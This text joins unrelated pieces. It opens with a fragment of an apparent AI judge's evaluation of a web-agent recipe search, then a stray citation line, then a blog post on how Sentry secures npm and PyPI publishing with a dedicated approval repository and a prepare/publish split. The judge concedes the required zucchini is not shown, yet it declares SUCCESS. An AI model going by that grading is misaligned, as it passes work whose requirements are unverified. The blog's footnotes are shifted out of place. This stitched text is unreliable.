"gpt_response_text": "To evaluate the task, we need to verify if the criteria have been met:\n\n1. **Recipe Requirement**: A vegetarian lasagna recipe with zucchini and at least a four-star rating.\n\n2. **Search and Results**:\n - The screenshots show that the search term used was \"vegetarian lasagna zucchini.\"\n - Among the search results, \"Debbie's Vegetable Lasagna\" is prominently featured.\n\n3. **Evaluation of the Recipe**:\n - Rating: \"Debbie's Vegetable Lasagna\" has a rating of 4.7, which satisfies the requirement of being at least four stars.\n - The presence of zucchini in the recipe is implied through the search conducted, though the screenshots do not explicitly show the ingredients list. However, the result response confirms the match to the criteria.\n\nGiven the information provided, the task seems to have fulfilled the requirement of finding a vegetarian lasagna recipe with zucchini and a four-star rating or higher. \n\n**Verdict: SUCCESS**"
}
Citation
If you use Fara in your research, please cite our work:
Releasing Packages with a Valet Key: npm, PyPI, and beyond
Disclaimer: This post should have been written about 5 years ago but I never got around to it; with the most recent Shai-Hulud attack, I thought it would be a good time to finally check this off the list and hopefully help others avoid supply-chain attacks.
About 5 years ago, I sat in on a meeting at Sentry in the midst of their SOC 2 compliance efforts. There was Armin, telling us that we needed a secret storage service for our package repository tokens — the tokens we used to deploy Sentry SDKs to package repositories such as npm, PyPI, etc. This was to ensure there were no unauthorized releases of our SDKs, which were embedded into all Sentry customers’ products. Only a limited set of people had access to these tokens at the time, and they became the bottleneck for more and more frequent releases. There was also the auditability issue: releases were performed from individuals’ workstations, and there was no easy way to trace a release back to where it originated or whether it was authorized.
For some reason I intuitively was against such a secret storage service and felt like the answer was somewhere in GitHub, GitHub Actions, and their secret storage service we already used. We already had the repo permissions, personnel structure, and all the visibility for auditing there. Heck, even the approval mechanics were there with pull requests. So I said “give me a week and I’ll get you a proof of concept” which Armin did and I delivered - though I think it took a bit more than a week 😅
Secrets in Plain Sight
Before we dive into the solution, let me paint a picture of the problem. Publishing packages to registries like npm, PyPI, or crates.io requires access tokens. These tokens are essentially the keys to the kingdom - whoever has them can publish anything under your organization’s name. At the time, these tokens were either distributed to select individuals, or lived in GitHub repository secrets, accessible to anyone with write access to the repository. [1]
Now, here’s the scary part: at Sentry, we had 90-100+ engineers with commit rights to our SDK repositories. Any one of them could:
Create a new workflow or modify an existing one
Access these secrets within that workflow
Exfiltrate them to any web service they controlled
Do all of the above without triggering any alarms
And the truly terrifying bit? Even if someone did steal these tokens, there would be no indication whatsoever. No alerts, no logs, nothing. They could sit on these credentials and use them months later, long after they’ve left the company. We’ve seen this exact scenario play out recently with supply-chain attacks like the Shai-Hulud npm takeover where attackers compromised maintainer accounts to publish malicious versions of popular packages.
The Valet Key
Some fancy cars come with a “valet key” - a special key you give to parking attendants or car wash folks. Unlike your regular key, this one has limited capabilities: maybe it can only go up to 20mph, can’t open the trunk, or won’t let you disable the alarm. It’s the same car, but with reduced privileges for reduced risk of theft.
This concept maps beautifully to our problem. Instead of giving everyone the full keys (the publishing tokens), why not give them a way to request the car to be moved (a release be made)? The actual keys stay with a very small, trusted (and monitored) group who are the builders and maintainers of the infrastructure. Even the approvers don’t actually have access to the keys!
Here’s what we wanted:
- Secrets in a secure, limited-access location - only 3-4 release engineers should have access
- Clear approval process - every release needs explicit sign-off from authorized personnel
- Low friction for developers - anyone should be able to request a release easily
- Full audit trail - everything logged, keeping things compliance-friendly
- No new infrastructure - we didn’t want to build or maintain a separate secrets service
As a side note, trusted publishing through OIDC and OAuth with limited and very short-lived tokens is the actual digital equivalent of valet keys. npm is slowly rolling this out [2], but at the time we built this system, it wasn’t an option. And even today, it’s not available at the organization/scope level, which is what we’d need. Also, we publish to way more places than npm, so we need a more generic solution.
Another approach worth mentioning is Google’s Wombat Dressing Room - an npm registry proxy that funnels all publishes through a single bot account with 2FA enabled. It’s a clever solution if you’re npm-only and want something off-the-shelf. That said, it still requires running a separate service. [3]
Enter getsentry/publish
The solution we landed on is beautifully simple in hindsight: a separate repository dedicated entirely to publishing. Here’s the trick:
- Write access is extremely limited - only 3-4 release engineers can actually modify the repo
- Release managers get “triage” access - GitHub’s triage role lets you manage issues and labels, but not code - perfect for approving releases
- Everyone else can create issues - that’s all you need to request a release
- Approval happens via labels - a release manager adds the “accepted” label to trigger the actual publish
The beauty of this setup is that the publishing tokens live only in this repo’s secrets. The repo itself is mostly static - we rarely need to modify the actual code - so the attack surface is minimal.
The Implementation (with Craft)
Under the hood, we use Craft, our CLI tool for managing releases. Craft was designed with a crucial architectural decision that predates the publish repo: it separates releases into two distinct phases - prepare and publish.
The prepare phase is where all the “dangerous” work happens: npm install, build scripts, test runs, changelog generation. This phase runs in the SDK repository without any access to publishing tokens. The resulting artifacts are uploaded to GitHub as, well, build artifacts.
The
publish
phase simply downloads these pre-built artifacts and pushes them to the registries. No
npm install
, no build scripts, no arbitrary code execution - just download and upload. This dramatically reduces the attack surface during the privileged publishing step. Even if an attacker managed to inject malicious code into a dependency, it would only execute during the prepare phase which has no access to publishing credentials.
This two-phase architecture is what makes supply-chain attacks like
Shai-Hulud
much harder to pull off against Sentry’s SDKs. The malicious code would need to somehow persist through the artifact upload/download cycle and execute during a phase that deliberately runs no code.
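Conceptually, the split looks something like the following sketch. At Sentry the two phases actually run in different repositories (the SDK repo and getsentry/publish); showing them as two jobs in one workflow is just a simplification:

```yaml
# Simplified sketch of the prepare/publish split (illustrative only).
jobs:
  prepare:                  # untrusted phase: builds run here, no publish secrets
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm run build        # arbitrary code executes in this phase
      - uses: actions/upload-artifact@v4
        with:
          name: release-artifacts
          path: dist/

  publish:                  # trusted phase: no install, no builds, only upload
    needs: prepare
    runs-on: ubuntu-latest
    steps:
      - uses: actions/download-artifact@v4
        with:
          name: release-artifacts
          path: dist/
      - uses: actions/setup-node@v4
        with:
          registry-url: https://registry.npmjs.org
      - run: npm publish dist/*.tgz         # pre-built tarball, no build step
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
```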
The magic happens with our GitHub Actions setup:
Developer triggers release workflow
in their SDK repo (e.g.,
sentry-javascript
)
action-prepare-release
runs
craft prepare
: creates the release branch, updates changelogs, builds artifacts, uploads them to GitHub
An issue is automatically created
in
getsentry/publish
with all the details: what changed, what’s being released, which targets
Release manager reviews and approves
by adding the “accepted” label
Publishing workflow triggers
craft publish
: downloads artifacts from GitHub and pushes to npm, PyPI, crates.io, etc. - no build step, just upload
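Step 1 above is just a plain workflow_dispatch workflow in the SDK repo, roughly along these lines (input, tag, and secret names here are illustrative - check getsentry/action-prepare-release for the real interface):

```yaml
# Illustrative SDK-side release trigger; names are not guaranteed to match
# the real getsentry/action-prepare-release interface.
name: release
on:
  workflow_dispatch:
    inputs:
      version:
        description: Version to release (leave empty to auto-detect)
        required: false

jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: getsentry/action-prepare-release@v1
        with:
          version: ${{ github.event.inputs.version }}
        env:
          # A bot token, not the default GITHUB_TOKEN, so the issue it creates
          # actually triggers workflows in getsentry/publish (see below).
          GITHUB_TOKEN: ${{ secrets.RELEASE_BOT_TOKEN }}
```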
Fighting Overprotective Parents
GitHub, bless their security-conscious hearts, put up quite a few guardrails that we had to work around. Here’s where things got… creative:
The Token Trigger Problem
: For the automation, we had to use the
Sentry Release Bot
, a GitHub App that generates short-lived tokens. This is crucial because
GITHUB_TOKEN
(the default token GitHub Actions creates) has a security restriction: events it triggers don’t start other workflows
4
. We needed workflows in
getsentry/publish
to trigger based on issues created from SDK repos, so we had to work around this.
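The common pattern for minting such a short-lived App token inside a workflow looks roughly like this; the actions/create-github-app-token action is real, but the secret names are placeholders:

```yaml
# Sketch: mint a short-lived GitHub App installation token so the issue we
# create actually triggers workflows in getsentry/publish. Secret names are
# placeholders for the App's credentials.
steps:
  - uses: actions/create-github-app-token@v1
    id: app-token
    with:
      app-id: ${{ secrets.RELEASE_BOT_APP_ID }}
      private-key: ${{ secrets.RELEASE_BOT_PRIVATE_KEY }}
      owner: getsentry
      repositories: publish
  - name: File the release request issue
    run: gh issue create --repo getsentry/publish --title "$TITLE" --body "$BODY"
    env:
      GH_TOKEN: ${{ steps.app-token.outputs.token }}
      TITLE: "Release <package>@<version>"   # placeholder values
      BODY: "Requested by the SDK release workflow"
```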
The Admin Bot Account
: We needed a bot that could commit directly to protected branches. GitHub’s branch protection rules
were all-or-nothing - you couldn’t say “this bot can commit, but only to update
CHANGELOG.md
”. So our bot ended up with admin access on all repos. Not ideal, but necessary
5
.
Composite Actions and Working Directories
: If you’ve ever tried to use GitHub’s composite actions with custom working directories, you know the pain. There’s no clean way to say “run this composite action from this subdirectory”. We ended up with various hacks involving explicit
cd
commands and careful path management.
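If you’re wondering what that looks like, it boils down to something like this inside the composite action definition (input names made up for illustration):

```yaml
# Illustrative cd workaround in a composite action: there is no way to run
# the whole composite action from a subdirectory, so each step cds explicitly.
inputs:
  path:
    description: Directory to run craft from
    required: true
  version:
    description: Version being prepared
    required: true
runs:
  using: composite
  steps:
    - shell: bash
      run: |
        cd "${{ inputs.path }}"   # explicit cd instead of an action-level working directory
        craft prepare "${{ inputs.version }}"
```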
Some More
Creative
Workarounds
: We maintain a small collection of ugly-but-necessary workarounds in our action definitions. They’re not pretty, but they work. Sometimes pragmatism beats elegance
6
.
Happily Ever After
After all this work, what did we actually achieve?
Compliance-friendly
✓ - every release is logged, approved, and traceable
Centralized secrets
- tokens live in one place, accessible to very few
Developer convenience
- anyone can request a release with a few clicks
Enterprise security
- no individual has publishing credentials on their machine
Full transparency
- the entire
publish repo
is open, notifications enabled for stakeholders
We’ve made more than
6,000 releases
through this system, and counting. Every single one is traceable: who requested it, who approved it, what changed, and when it shipped.
Why This Matters Today
Recent supply-chain attacks like
Shai-Hulud
show exactly why this architecture matters. When attackers compromise a maintainer’s npm account, they can publish malicious versions of packages that millions of developers will automatically install. With our system:
No individual at Sentry has npm/PyPI/crates.io credentials on their machine
Every release requires explicit approval from a release manager
The approval happens in a public repo with full audit trail
Any suspicious activity would be immediately visible
Is it perfect? No. Could a determined attacker with inside access still cause damage? Probably. But we’ve dramatically reduced the attack surface and made any compromise immediately visible and auditable.
Closing Thoughts
Looking back, this is one of my proudest achievements at Sentry. It’s not flashy - no one’s going to write a blog post titled “Revolutionary New Way to Click a Label” - but it’s the kind of infrastructure that quietly makes everything more secure and more convenient at the same time.
7
If you’re dealing with similar challenges, I encourage you to check out
getsentry/publish
and
Craft
. The concepts are transferable even if you don’t use our exact implementation.
And hey, it only took me 5 years to write about it. Better late than never, right? 😅
Thanks
I’d like to thank the following people:
Armin
and
Daniel
for their trust and support in building this system.
Jeffery
for reviewing this post thoroughly and being my partner in crime for many things security at Sentry.
Michael
for giving me the push I needed to write this post, coming up with the awesome post image idea, and for his support and guidance on the post itself.
This was before GitHub introduced “environment secrets”, which allow more granular access control. Even with those, the problem isn’t fully solved for our use case.
↩
If only someone could make this run directly in GitHub Actions…
↩
This is actually a smart security feature - imagine a workflow that creates a commit that triggers itself. Infinite loop, infinite bills, infinite sadness.
↩
This has since been fixed with
by-pass rules via rule sets
, and the bots no longer have admin access. Phew.
↩
If you peek at the repo, you’ll see what I mean. I’m not proud of all of it, but I’m proud it works.
↩
Especially while “security means more friction” is still a thing.
↩